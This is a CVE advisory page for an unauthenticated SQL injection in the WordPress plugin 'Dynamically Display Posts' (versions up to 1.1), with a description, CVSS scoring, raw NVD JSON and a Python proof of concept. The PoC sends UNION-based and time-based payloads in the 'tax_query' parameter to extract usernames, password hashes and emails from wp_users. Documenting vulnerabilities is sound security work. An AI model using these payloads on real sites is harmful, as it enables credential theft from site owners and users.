Security Vulnerability Report
CVE-2025-11501 CVSS 7.5 HIGH

CVE-2025-11501

Published: 2025-10-15 08:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Dynamically Display Posts plugin for WordPress is vulnerable to SQL Injection via the 'tax_query' parameter in all versions up to, and including, 1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Dynamically Display Posts <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11501 PoC - SQL Injection in WordPress Dynamically Display Posts Plugin
# Vulnerability: Unauthenticated SQL Injection via 'tax_query' parameter
# Affected: All versions up to and including 1.1
import time

import requests

target_url = "http://target-wordpress-site.com"

# The vulnerable endpoint is typically accessed via the plugin's frontend
vulnerable_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Crafted payload exploiting the tax_query parameter
# Using UNION-based SQL injection to extract sensitive data
payload = {
    "action": "ddp_get_posts",
    "tax_query": "1) UNION SELECT user_login,user_pass,user_email,1 FROM wp_users-- -"
}

# Send the malicious request
response = requests.post(vulnerable_endpoint, data=payload)

if response.status_code == 200:
    print("[+] SQL Injection successful!")
    print("[+] Response contains database data:")
    print(response.text)
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Alternative payload using time-based blind SQL injection
time_payload = {
    "action": "ddp_get_posts",
    "tax_query": "1) AND (SELECT SLEEP(5))-- -"
}

start_time = time.time()
response = requests.post(vulnerable_endpoint, data=time_payload)
elapsed_time = time.time() - start_time

if elapsed_time >= 5:
    print("[+] Time-based SQL Injection confirmed!")
    print(f"[+] Response time: {elapsed_time:.2f} seconds")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11501", "sourceIdentifier": "[email protected]", "published": "2025-10-15T08:15:33.847", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Dynamically Display Posts plugin for WordPress is vulnerable to SQL Injection via the 'tax_query' parameter in all versions up to, and including, 1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/dynamically-display-posts/trunk/includes/frontend/classes/database-talk.php#L38", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ad5698-4299-48a4-bcc1-5f4436dfab27?source=cve", "source": "[email protected]"}]}}